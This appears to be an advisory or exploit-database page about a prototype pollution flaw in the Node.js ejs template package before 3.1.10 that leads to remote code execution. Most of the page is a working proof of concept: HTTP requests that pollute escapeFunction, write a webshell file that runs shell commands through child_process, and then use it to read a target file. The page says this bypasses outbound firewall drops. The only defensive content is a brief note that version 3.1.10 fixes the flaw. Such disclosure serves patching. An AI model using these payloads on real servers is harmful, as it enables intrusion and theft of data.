The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.
Insufficient Prototype Pollution Validation Leading to RCE Exploitation
- With prototype pollution, set opts.client to truthy value (condition)
- Then, when render() runs, ejs will run opts.escapeFunction value as JS code.
PoC (Inject webshell & activate)
1. GET /pollute?target=client&value=1
2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");
3. GET /
- Inject webshell
4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");
5. GET /
- Activate webshell
- Above PoC can bypass outbound packet drop of ufw firewall.
- All version under 3.1.10 is vulnerable for this type of attack.
- This is RCE vulnerability, and do not abuse on live server.
Attack available condition
- Needs control of render().
- Needs control of prototype pollution attack vector.
- Above two condition holds, RCE attack is avilable.
How can I prevent this attack?
- Fixed version(ejs@3.1.10) is available now.
File Size: Not Define
What do you think?
It is nice to know your opinion. Leave a comment.